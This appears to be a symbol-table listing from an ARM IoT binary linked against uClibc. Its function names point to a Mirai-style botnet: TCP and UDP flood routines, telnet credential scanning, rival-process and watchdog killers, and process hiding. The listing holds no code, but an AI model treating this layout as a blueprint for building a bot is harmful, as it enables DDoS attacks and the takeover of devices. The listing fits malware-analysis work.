        __GI_wcrtomb.symtab0x1bb9880FUNC<unknown>HIDDEN2
        __GI_wcsnrtombs.symtab0x1bc08188FUNC<unknown>HIDDEN2
        __GI_wcsrtombs.symtab0x1bbe832FUNC<unknown>HIDDEN2
        __GI_write.symtab0x17ba044FUNC<unknown>HIDDEN2
        __JCR_END__.symtab0x2b0140OBJECT<unknown>DEFAULT8
        __JCR_LIST__.symtab0x2b0140OBJECT<unknown>DEFAULT8
        __adddf3.symtab0x1d544736FUNC<unknown>DEFAULT2
        __aeabi_cdcmpeq.symtab0x1df1420FUNC<unknown>DEFAULT2
        __aeabi_cdcmple.symtab0x1df1420FUNC<unknown>DEFAULT2
        __aeabi_cdrcmple.symtab0x1def848FUNC<unknown>DEFAULT2
        __aeabi_d2uiz.symtab0x1df8c84FUNC<unknown>DEFAULT2
        __aeabi_dadd.symtab0x1d544736FUNC<unknown>DEFAULT2
        __aeabi_dcmpeq.symtab0x1df2820FUNC<unknown>DEFAULT2
        __aeabi_dcmpge.symtab0x1df6420FUNC<unknown>DEFAULT2
        __aeabi_dcmpgt.symtab0x1df7820FUNC<unknown>DEFAULT2
        __aeabi_dcmple.symtab0x1df5020FUNC<unknown>DEFAULT2
        __aeabi_dcmplt.symtab0x1df3c20FUNC<unknown>DEFAULT2
        __aeabi_ddiv.symtab0x1dc60516FUNC<unknown>DEFAULT2
        __aeabi_dmul.symtab0x1d938808FUNC<unknown>DEFAULT2
        __aeabi_drsub.symtab0x1d5380FUNC<unknown>DEFAULT2
        __aeabi_dsub.symtab0x1d540740FUNC<unknown>DEFAULT2
        __aeabi_f2d.symtab0x1d87864FUNC<unknown>DEFAULT2
        __aeabi_i2d.symtab0x1d84c44FUNC<unknown>DEFAULT2
        __aeabi_idiv.symtab0x1d3f80FUNC<unknown>DEFAULT2
        __aeabi_idiv0.symtab0x177dc4FUNC<unknown>DEFAULT2
        __aeabi_idivmod.symtab0x1d52024FUNC<unknown>DEFAULT2
        __aeabi_l2d.symtab0x1d8cc108FUNC<unknown>DEFAULT2
        __aeabi_ldiv0.symtab0x177dc4FUNC<unknown>DEFAULT2
        __aeabi_ui2d.symtab0x1d82440FUNC<unknown>DEFAULT2
        __aeabi_uidiv.symtab0x1751c0FUNC<unknown>DEFAULT2
        __aeabi_uidivmod.symtab0x1761424FUNC<unknown>DEFAULT2
        __aeabi_ul2d.symtab0x1d8b8128FUNC<unknown>DEFAULT2
        __app_fini.symtab0x2e2184OBJECT<unknown>HIDDEN10
        __atexit_lock.symtab0x2b8fc24OBJECT<unknown>DEFAULT9
        __bsd_signal.symtab0x19758184FUNC<unknown>HIDDEN2
        __bss_end__.symtab0x2e3080NOTYPE<unknown>DEFAULTSHN_ABS
        __bss_start.symtab0x2b9200NOTYPE<unknown>DEFAULTSHN_ABS
        __bss_start__.symtab0x2b9200NOTYPE<unknown>DEFAULTSHN_ABS
        __check_one_fd.symtab0x1ae9c56FUNC<unknown>DEFAULT2
        __cmpdf2.symtab0x1de74132FUNC<unknown>DEFAULT2
        __ctype_b.symtab0x2b91c4OBJECT<unknown>DEFAULT9
        __curbrk.symtab0x2e22c4OBJECT<unknown>HIDDEN10
        __data_start.symtab0x2b0180NOTYPE<unknown>DEFAULT9
        __default_rt_sa_restorer.symtab0x1b2940FUNC<unknown>DEFAULT2
        __default_sa_restorer.symtab0x1b2900FUNC<unknown>DEFAULT2
        __deregister_frame_info.symtab0x00NOTYPE<unknown>DEFAULTSHN_UNDEF
        __div0.symtab0x177dc4FUNC<unknown>DEFAULT2
        __divdf3.symtab0x1dc60516FUNC<unknown>DEFAULT2
        __divsi3.symtab0x1d3f8296FUNC<unknown>DEFAULT2
        __do_global_ctors_aux.symtab0x1dfe00FUNC<unknown>DEFAULT2
        __do_global_dtors_aux.symtab0x80b00FUNC<unknown>DEFAULT2
        __dso_handle.symtab0x2b01c0OBJECT<unknown>HIDDEN9
        __end__.symtab0x2e3080NOTYPE<unknown>DEFAULTSHN_ABS
        __environ.symtab0x2e2104OBJECT<unknown>DEFAULT10
        __eqdf2.symtab0x1de74132FUNC<unknown>DEFAULT2
        __errno_location.symtab0x17e4c12FUNC<unknown>DEFAULT2
        __errno_location.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
        __error.symtab0x1b2840NOTYPE<unknown>DEFAULT2
        __exit_cleanup.symtab0x2e2084OBJECT<unknown>HIDDEN10
        __extendsfdf2.symtab0x1d87864FUNC<unknown>DEFAULT2
        __fini_array_end.symtab0x2b0040NOTYPE<unknown>HIDDENSHN_ABS
        __fini_array_start.symtab0x2b0040NOTYPE<unknown>HIDDENSHN_ABS
        __fixunsdfsi.symtab0x1df8c84FUNC<unknown>DEFAULT2
        __floatdidf.symtab0x1d8cc108FUNC<unknown>DEFAULT2
        __floatsidf.symtab0x1d84c44FUNC<unknown>DEFAULT2
        __floatundidf.symtab0x1d8b8128FUNC<unknown>DEFAULT2
        __floatunsidf.symtab0x1d82440FUNC<unknown>DEFAULT2
        __gedf2.symtab0x1de64148FUNC<unknown>DEFAULT2
        __getdents.symtab0x1b394148FUNC<unknown>HIDDEN2
        __getdents64.symtab0x1b428356FUNC<unknown>HIDDEN2
        __getpagesize.symtab0x1b61024FUNC<unknown>DEFAULT2
        __glibc_strerror_r.symtab0x1935020FUNC<unknown>DEFAULT2
        __glibc_strerror_r.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
        __gtdf2.symtab0x1de64148FUNC<unknown>DEFAULT2
        __h_errno_location.symtab0x00NOTYPE<unknown>DEFAULTSHN_UNDEF
        __heap_alloc.symtab0x19c30148FUNC<unknown>DEFAULT2
        __heap_alloc_at.symtab0x19cc4140FUNC<unknown>DEFAULT2
        __heap_free.symtab0x19d84244FUNC<unknown>DEFAULT2
        __heap_link_free_area.symtab0x19d5032FUNC<unknown>DEFAULT2
        __heap_link_free_area_after.symtab0x19d7020FUNC<unknown>DEFAULT2
        __init_array_end.symtab0x2b0040NOTYPE<unknown>HIDDENSHN_ABS
        __init_array_start.symtab0x2b0040NOTYPE<unknown>HIDDENSHN_ABS
        __ledf2.symtab0x1de6c140FUNC<unknown>DEFAULT2
        __libc_close.symtab0x178a444FUNC<unknown>DEFAULT2
        __libc_connect.symtab0x195b444FUNC<unknown>DEFAULT2
        __libc_creat.symtab0x17aac16FUNC<unknown>DEFAULT2
        __libc_fcntl.symtab0x177e0116FUNC<unknown>DEFAULT2
        __libc_fcntl64.symtab0x1785480FUNC<unknown>DEFAULT2
        __libc_fork.symtab0x178d044FUNC<unknown>DEFAULT2
        __libc_getpid.symtab0x1792444FUNC<unknown>DEFAULT2
        __libc_lseek64.symtab0x1b628100FUNC<unknown>DEFAULT2
        __libc_nanosleep.symtab0x1b68c44FUNC<unknown>DEFAULT2
        __libc_open.symtab0x17a5092FUNC<unknown>DEFAULT2
        __libc_read.symtab0x17aec44FUNC<unknown>DEFAULT2
        __libc_recv.symtab0x1963c44FUNC<unknown>DEFAULT2
        __libc_recvfrom.symtab0x1966852FUNC<unknown>DEFAULT2
        __libc_select.symtab0x17b4448FUNC<unknown>DEFAULT2
        __libc_send.symtab0x1969c44FUNC<unknown>DEFAULT2
        __libc_sendto.symtab0x196c852FUNC<unknown>DEFAULT2
        __libc_sigaction.symtab0x1b17c228FUNC<unknown>DEFAULT2
        __libc_stack_end.symtab0x2e20c4OBJECT<unknown>DEFAULT10
        __libc_system.symtab0x1a4c4312FUNC<unknown>DEFAULT2
        __libc_write.symtab0x17ba044FUNC<unknown>DEFAULT2
        __ltdf2.symtab0x1de6c140FUNC<unknown>DEFAULT2
        __malloc_heap.symtab0x2b7284OBJECT<unknown>DEFAULT9
        __malloc_heap_lock.symtab0x2e1ec24OBJECT<unknown>DEFAULT10
        __malloc_sbrk_lock.symtab0x2e2e824OBJECT<unknown>DEFAULT10
        __modsi3.symtab0x176f8228FUNC<unknown>DEFAULT2
        __muldf3.symtab0x1d938808FUNC<unknown>DEFAULT2
        __nedf2.symtab0x1de74132FUNC<unknown>DEFAULT2
        __pagesize.symtab0x2e2144OBJECT<unknown>DEFAULT10
        __preinit_array_end.symtab0x2b0040NOTYPE<unknown>HIDDENSHN_ABS
        __preinit_array_start.symtab0x2b0040NOTYPE<unknown>HIDDENSHN_ABS
        __pthread_initialize_minimal.symtab0x00NOTYPE<unknown>DEFAULTSHN_UNDEF
        __pthread_mutex_init.symtab0x1ae908FUNC<unknown>DEFAULT2
        __pthread_mutex_lock.symtab0x1ae908FUNC<unknown>DEFAULT2
        __pthread_mutex_trylock.symtab0x1ae908FUNC<unknown>DEFAULT2
        __pthread_mutex_unlock.symtab0x1ae908FUNC<unknown>DEFAULT2
        __pthread_return_0.symtab0x1ae908FUNC<unknown>DEFAULT2
        __pthread_return_void.symtab0x1ae984FUNC<unknown>DEFAULT2
        __raise.symtab0x1d12c24FUNC<unknown>HIDDEN2
        __register_frame_info.symtab0x00NOTYPE<unknown>DEFAULTSHN_UNDEF
        __rtld_fini.symtab0x2e21c4OBJECT<unknown>HIDDEN10
        __sigaddset.symtab0x1983436FUNC<unknown>DEFAULT2
        __sigdelset.symtab0x1985836FUNC<unknown>DEFAULT2
        __sigismember.symtab0x1981036FUNC<unknown>DEFAULT2
        __stdin.symtab0x2b5f84OBJECT<unknown>DEFAULT9
        __stdio_WRITE.symtab0x1bcc4188FUNC<unknown>HIDDEN2
        __stdio_adjust_position.symtab0x1d2fc204FUNC<unknown>HIDDEN2
        __stdio_fwrite.symtab0x1bd80312FUNC<unknown>HIDDEN2
        __stdio_init_mutex.symtab0x1801016FUNC<unknown>HIDDEN2
        __stdio_mutex_initializer.3929.symtab0x2203c24OBJECT<unknown>DEFAULT4
        __stdio_seek.symtab0x1d3c848FUNC<unknown>HIDDEN2
        __stdio_trans2w_o.symtab0x1beb8260FUNC<unknown>HIDDEN2
        __stdio_wcommit.symtab0x180d848FUNC<unknown>HIDDEN2
        __stdout.symtab0x2b5fc4OBJECT<unknown>DEFAULT9
        __subdf3.symtab0x1d540740FUNC<unknown>DEFAULT2
        __syscall_error.symtab0x1d1a428FUNC<unknown>HIDDEN2
        __syscall_error.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
        __syscall_fcntl.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
        __syscall_fcntl64.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
        __syscall_rt_sigaction.symtab0x1b29844FUNC<unknown>HIDDEN2
        __syscall_rt_sigaction.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
        __uClibc_fini.symtab0x1ae24108FUNC<unknown>DEFAULT2
        __uClibc_init.symtab0x1aed492FUNC<unknown>DEFAULT2
        __uClibc_main.symtab0x1af30588FUNC<unknown>DEFAULT2
        __uClibc_main.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
        __uclibc_progname.symtab0x2b9144OBJECT<unknown>HIDDEN9
        __udivsi3.symtab0x1751c248FUNC<unknown>DEFAULT2
        __umodsi3.symtab0x1762c204FUNC<unknown>DEFAULT2
        __vfork.symtab0x1b26040FUNC<unknown>HIDDEN2
        __xpg_strerror_r.symtab0x19364232FUNC<unknown>DEFAULT2
        __xpg_strerror_r.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
        __xstat64_conv.symtab0x1b7bc784FUNC<unknown>HIDDEN2
        __xstat_conv.symtab0x1bacc204FUNC<unknown>HIDDEN2
        _adjust_pos.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
        _bss_end__.symtab0x2e3080NOTYPE<unknown>DEFAULTSHN_ABS
        _charpad.symtab0x1810876FUNC<unknown>DEFAULT2
        _cs_funcs.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
        _dl_aux_init.symtab0x1d14436FUNC<unknown>DEFAULT2
        _dl_phdr.symtab0x2e3004OBJECT<unknown>DEFAULT10
        _dl_phnum.symtab0x2e3044OBJECT<unknown>DEFAULT10
        _edata.symtab0x2b9200NOTYPE<unknown>DEFAULTSHN_ABS
        _end.symtab0x2e3080NOTYPE<unknown>DEFAULTSHN_ABS
        _errno.symtab0x2e2244OBJECT<unknown>DEFAULT10
        _exit.symtab0x1b2c440FUNC<unknown>DEFAULT2
        _exit.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
        _fini.symtab0x1e01c4FUNC<unknown>DEFAULT3
        _fixed_buffers.symtab0x2c1dc8192OBJECT<unknown>DEFAULT10
        _fp_out_narrow.symtab0x18154132FUNC<unknown>DEFAULT2
        _fpmaxtostr.symtab0x1c1b02036FUNC<unknown>HIDDEN2
        _fpmaxtostr.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
        _fwrite.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
        _h_errno.symtab0x2e2284OBJECT<unknown>DEFAULT10
        _init.symtab0x80944FUNC<unknown>DEFAULT1
        _load_inttype.symtab0x1bfbc112FUNC<unknown>HIDDEN2
        _load_inttype.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
        _memcpy.symtab0x1c9b00FUNC<unknown>HIDDEN2
        _ppfs_init.symtab0x187cc152FUNC<unknown>HIDDEN2
        _ppfs_init.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
        _ppfs_parsespec.symtab0x18a841220FUNC<unknown>HIDDEN2
        _ppfs_parsespec.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
        _ppfs_prepargs.symtab0x1886456FUNC<unknown>HIDDEN2
        _ppfs_prepargs.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
        _ppfs_setargs.symtab0x1889c412FUNC<unknown>HIDDEN2
        _ppfs_setargs.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
        _promoted_size.symtab0x18a3876FUNC<unknown>DEFAULT2
        _pthread_cleanup_pop_restore.symtab0x1ae984FUNC<unknown>DEFAULT2
        _pthread_cleanup_push_defer.symtab0x1ae984FUNC<unknown>DEFAULT2
        _sigintr.symtab0x2e268128OBJECT<unknown>HIDDEN10
        _start.symtab0x81900FUNC<unknown>DEFAULT2
        _stdio.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
        _stdio_init.symtab0x17fa0112FUNC<unknown>HIDDEN2
        _stdio_openlist.symtab0x2b6004OBJECT<unknown>DEFAULT9
        _stdio_openlist_add_lock.symtab0x2b60424OBJECT<unknown>DEFAULT9
        _stdio_openlist_del_count.symtab0x2c1d84OBJECT<unknown>DEFAULT10
        _stdio_openlist_del_lock.symtab0x2b61c24OBJECT<unknown>DEFAULT9
        _stdio_openlist_use_count.symtab0x2c1d44OBJECT<unknown>DEFAULT10
        _stdio_streams.symtab0x2b638240OBJECT<unknown>DEFAULT9
        _stdio_term.symtab0x18020184FUNC<unknown>HIDDEN2
        _stdio_user_locking.symtab0x2b6344OBJECT<unknown>DEFAULT9
        _stdlib_strto_l.symtab0x1a610408FUNC<unknown>HIDDEN2
        _stdlib_strto_l.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
        _store_inttype.symtab0x1c02c52FUNC<unknown>HIDDEN2
        _store_inttype.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
        _string_syserrmsgs.symtab0x221042906OBJECT<unknown>HIDDEN4
        _string_syserrmsgs.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
        _trans2w.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
        _uintmaxtostr.symtab0x1c060336FUNC<unknown>HIDDEN2
        _uintmaxtostr.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
        _vfprintf_internal.symtab0x181d81524FUNC<unknown>HIDDEN2
        _vfprintf_internal.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
        _wcommit.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
        abort.symtab0x19e78328FUNC<unknown>DEFAULT2
        abort.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
        arm_bins.symtab0x2b4b060OBJECT<unknown>DEFAULT9
        atoi.symtab0x1a5fc12FUNC<unknown>DEFAULT2
        atol.symtab0x1a5fc12FUNC<unknown>DEFAULT2
        atol.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
        been_there_done_that.symtab0x2e2044OBJECT<unknown>DEFAULT10
        been_there_done_that.2789.symtab0x2e2204OBJECT<unknown>DEFAULT10
        bind.symtab0x1958844FUNC<unknown>DEFAULT2
        bind.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
        brk.symtab0x1d16860FUNC<unknown>DEFAULT2
        brk.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
        bsd_signal.symtab0x19758184FUNC<unknown>DEFAULT2
        buf.2613.symtab0x2e1dc16OBJECT<unknown>DEFAULT10
        c.symtab0x2c1d04OBJECT<unknown>DEFAULT10
        call___do_global_ctors_aux.symtab0x1e0140FUNC<unknown>DEFAULT2
        call___do_global_dtors_aux.symtab0x81280FUNC<unknown>DEFAULT2
        call_frame_dummy.symtab0x81880FUNC<unknown>DEFAULT2
        calloc.symtab0x199d088FUNC<unknown>DEFAULT2
        calloc.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
        check_maps_for_match.symtab0xc868776FUNC<unknown>DEFAULT2
        check_sum.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
        check_sum_generic.symtab0x81cc92FUNC<unknown>DEFAULT2
        check_sum_tcp_udp.symtab0x8228176FUNC<unknown>DEFAULT2
        check_timeout.symtab0x155e8288FUNC<unknown>DEFAULT2
        cipher_box.symtab0x10788496FUNC<unknown>DEFAULT2
        cipher_shuffle.symtab0x10628352FUNC<unknown>DEFAULT2
        clock.symtab0x17e5852FUNC<unknown>DEFAULT2
        clock.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
        clock_getres.symtab0x1b2ec44FUNC<unknown>DEFAULT2
        clock_getres.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
        close.symtab0x178a444FUNC<unknown>DEFAULT2
        close.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
        closedir.symtab0x17bcc180FUNC<unknown>DEFAULT2
        closedir.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
        command.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
        command_flood.symtab0x831c304FUNC<unknown>DEFAULT2
        command_list.symtab0x2e23448OBJECT<unknown>DEFAULT10
        command_parse.symtab0x844c348FUNC<unknown>DEFAULT2
        commands.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
        compare_telnet_prompts.symtab0x13730464FUNC<unknown>DEFAULT2
        completed.2555.symtab0x2b9201OBJECT<unknown>DEFAULT10
        conn_table.symtab0x2e2644OBJECT<unknown>DEFAULT10
        connect.symtab0x195b444FUNC<unknown>DEFAULT2
        connect.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
        connected.symtab0x2b9601OBJECT<unknown>DEFAULT10
        creat.symtab0x17aac16FUNC<unknown>DEFAULT2
        crtstuff.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
        crtstuff.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
        current.symtab0x2b9484OBJECT<unknown>DEFAULT10
        current.symtab0x2c1c84OBJECT<unknown>DEFAULT10
        current.symtab0x2b9404OBJECT<unknown>DEFAULT10
        datum.symtab0x2b160848OBJECT<unknown>DEFAULT9
        dl-support.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
        encrypt_t.symtab0x10ac0368FUNC<unknown>DEFAULT2
        entry.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
        environ.symtab0x2e2104OBJECT<unknown>DEFAULT10
        errno.symtab0x2e2244OBJECT<unknown>DEFAULT10
        errno.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
        establish_connection.symtab0x1058c156FUNC<unknown>DEFAULT2
        execl.symtab0x1a83c148FUNC<unknown>DEFAULT2
        execl.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
        execve.symtab0x1b31844FUNC<unknown>DEFAULT2
        execve.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
        exit.symtab0x1a7a8148FUNC<unknown>DEFAULT2
        exit.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
        exp10_table.symtab0x22fb872OBJECT<unknown>DEFAULT4
        fail_or_success_prompts.symtab0x2b0b436OBJECT<unknown>DEFAULT9
        fail_or_success_size.symtab0x2b9844OBJECT<unknown>DEFAULT10
        failed_prompts.symtab0x2b08c32OBJECT<unknown>DEFAULT9
        failed_prompts_size.symtab0x2b97c4OBJECT<unknown>DEFAULT10
        fake_time.symtab0x2c1bc4OBJECT<unknown>DEFAULT10
        fcntl.symtab0x177e0116FUNC<unknown>DEFAULT2
        fcntl64.symtab0x1785480FUNC<unknown>DEFAULT2
        fd.symtab0x2b0244OBJECT<unknown>DEFAULT9
        find_watchdog_driver.symtab0x1739c364FUNC<unknown>DEFAULT2
        flood_tcp_ack.symtab0x8e781888FUNC<unknown>DEFAULT2
        flood_tcp_gack.symtab0xabfc1892FUNC<unknown>DEFAULT2
        flood_tcp_gsyn.symtab0x9d381892FUNC<unknown>DEFAULT2
        flood_tcp_sack.symtab0x95d81888FUNC<unknown>DEFAULT2
        flood_tcp_socket.symtab0x8930268FUNC<unknown>DEFAULT2
        flood_tcp_stomp.symtab0xa49c1888FUNC<unknown>DEFAULT2
        flood_tcp_syn.symtab0xb3601888FUNC<unknown>DEFAULT2
        flood_udp_bypass.symtab0x8740496FUNC<unknown>DEFAULT2
        flood_udp_classic.symtab0x8c58544FUNC<unknown>DEFAULT2
        flood_udp_plain.symtab0x8a3c540FUNC<unknown>DEFAULT2
        fmt.symtab0x22fa420OBJECT<unknown>DEFAULT4
        force_to_data.symtab0x2b0180OBJECT<unknown>DEFAULT9
        fork.symtab0x178d044FUNC<unknown>DEFAULT2
        fork.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
        fputs_unlocked.symtab0x18f4852FUNC<unknown>DEFAULT2
        fputs_unlocked.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
        frame_dummy.symtab0x81300FUNC<unknown>DEFAULT2
        free.symtab0x19a28240FUNC<unknown>DEFAULT2
        free.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
        fseek.symtab0x1d1c012FUNC<unknown>DEFAULT2
        fseeko.symtab0x1d1c012FUNC<unknown>DEFAULT2
        fseeko.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
        fseeko64.symtab0x1d1cc304FUNC<unknown>DEFAULT2
        fseeko64.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
        fstat.symtab0x1b34480FUNC<unknown>DEFAULT2
        fstat.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
        fwrite_unlocked.symtab0x18f7c172FUNC<unknown>DEFAULT2
        fwrite_unlocked.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
        get_random_ip.symtab0x12bbc324FUNC<unknown>DEFAULT2
        getdents.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
        getdents64.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
        getdtablesize.symtab0x178fc40FUNC<unknown>DEFAULT2
        getdtablesize.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
        getegid.symtab0x1b58c44FUNC<unknown>DEFAULT2
        getegid.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
        geteuid.symtab0x1b5b844FUNC<unknown>DEFAULT2
        geteuid.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
        getgid.symtab0x1b5e444FUNC<unknown>DEFAULT2
        getgid.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
        getpagesize.symtab0x1b61024FUNC<unknown>DEFAULT2
        getpagesize.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
        getpid.symtab0x1792444FUNC<unknown>DEFAULT2
        getpid.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
        getppid.symtab0x1795044FUNC<unknown>DEFAULT2
        getppid.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
        getrlimit.symtab0x1797c44FUNC<unknown>DEFAULT2
        getrlimit.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
        getsockname.symtab0x195e044FUNC<unknown>DEFAULT2
        getsockname.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
        getsockopt.symtab0x1960c48FUNC<unknown>DEFAULT2
        getsockopt.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
        getuid.symtab0x179a844FUNC<unknown>DEFAULT2
        getuid.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
        h_errno.symtab0x2e2284OBJECT<unknown>DEFAULT10
        heap_alloc.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
        heap_alloc_at.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
        heap_free.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
        hide_maps_proc.symtab0xf874336FUNC<unknown>DEFAULT2
        inet_addr.symtab0x1956436FUNC<unknown>DEFAULT2
        inet_aton.symtab0x1d040236FUNC<unknown>DEFAULT2
        inet_aton.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
        inet_makeaddr.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
        inet_ntoa.symtab0x1955812FUNC<unknown>DEFAULT2
        inet_ntoa.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
        inet_ntoa_r.symtab0x194d8128FUNC<unknown>DEFAULT2
        init_cipher_state.symtab0x10978328FUNC<unknown>DEFAULT2
        init_commands.symtab0x866c212FUNC<unknown>DEFAULT2
        init_entrys.symtab0xbcbc2968FUNC<unknown>DEFAULT2
        init_logins.symtab0x12ebc440FUNC<unknown>DEFAULT2
        init_prompts.symtab0x13130844FUNC<unknown>DEFAULT2
        init_rand.symtab0x1025892FUNC<unknown>DEFAULT2
        init_scan.symtab0x10c308056FUNC<unknown>DEFAULT2
        initfini.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
        initfini.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
        initial_fa.symtab0x2b72c260OBJECT<unknown>DEFAULT9
        initstate.symtab0x1a0cc152FUNC<unknown>DEFAULT2
        initstate_r.symtab0x1a3fc200FUNC<unknown>DEFAULT2
        ioctl.symtab0x179d480FUNC<unknown>DEFAULT2
        ioctl.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
        isatty.symtab0x1944c32FUNC<unknown>DEFAULT2
        isatty.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
        kill.symtab0x17a2444FUNC<unknown>DEFAULT2
        kill.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
        kill_bad_processes.symtab0xcb7011524FUNC<unknown>DEFAULT2
        kill_killer.symtab0xc85420FUNC<unknown>DEFAULT2
        kill_scanners.symtab0x12ba820FUNC<unknown>DEFAULT2
        kill_watchdog_maintainer.symtab0x1750820FUNC<unknown>DEFAULT2
        killer.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
        killer_pid.symtab0x2b9584OBJECT<unknown>DEFAULT10
        libc/string/arm/_memcpy.S.symtab0x00FILE<unknown>DEFAULTSHN_ABS
        libc/string/arm/memcpy.S.symtab0x00FILE<unknown>DEFAULTSHN_ABS
        libc/string/arm/memmove.S.symtab0x00FILE<unknown>DEFAULTSHN_ABS
        libc/string/arm/memset.S.symtab0x00FILE<unknown>DEFAULTSHN_ABS
        libc/string/arm/strlen.S.symtab0x00FILE<unknown>DEFAULTSHN_ABS
        libc/sysdeps/linux/arm/crt1.S.symtab0x00FILE<unknown>DEFAULTSHN_ABS
        libc/sysdeps/linux/arm/crti.S.symtab0x00FILE<unknown>DEFAULTSHN_ABS
        libc/sysdeps/linux/arm/crtn.S.symtab0x00FILE<unknown>DEFAULTSHN_ABS
        libc/sysdeps/linux/arm/sigrestorer.S.symtab0x00FILE<unknown>DEFAULTSHN_ABS
        libc/sysdeps/linux/arm/vfork.S.symtab0x00FILE<unknown>DEFAULTSHN_ABS
        llseek.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
        load_login.symtab0x12d00444FUNC<unknown>DEFAULT2
        load_prompt.symtab0x13074188FUNC<unknown>DEFAULT2
        lock_entry.symtab0xbb9c220FUNC<unknown>DEFAULT2
        login_prompts.symtab0x2b05060OBJECT<unknown>DEFAULT9
        login_prompts_size.symtab0x2b9784OBJECT<unknown>DEFAULT10
        lseek64.symtab0x1b628100FUNC<unknown>DEFAULT2
        main.symtab0xf9c42108FUNC<unknown>DEFAULT2
        main.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
        main_pid1.symtab0x2b94c4OBJECT<unknown>DEFAULT10
        main_pid2.symtab0x2b9504OBJECT<unknown>DEFAULT10
        malloc.symtab0x1987c340FUNC<unknown>DEFAULT2
        malloc.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
        max_credentials.symtab0x2c1c02OBJECT<unknown>DEFAULT10
        max_weight.symtab0x2c1b82OBJECT<unknown>DEFAULT10
        memchr.symtab0x1ce40252FUNC<unknown>DEFAULT2
        memchr.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
        memcpy.symtab0x190304FUNC<unknown>DEFAULT2
        memmove.symtab0x190404FUNC<unknown>DEFAULT2
        mempcpy.symtab0x1cf3c24FUNC<unknown>DEFAULT2
        mempcpy.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
        memrchr.symtab0x1cf54236FUNC<unknown>DEFAULT2
        memrchr.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
        memset.symtab0x19050156FUNC<unknown>DEFAULT2
        multiple_read_until.symtab0x139e0492FUNC<unknown>DEFAULT2
        mylock.symtab0x2b83024OBJECT<unknown>DEFAULT9
        mylock.symtab0x2b84824OBJECT<unknown>DEFAULT9
        nanosleep.symtab0x1b68c44FUNC<unknown>DEFAULT2
        nanosleep.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
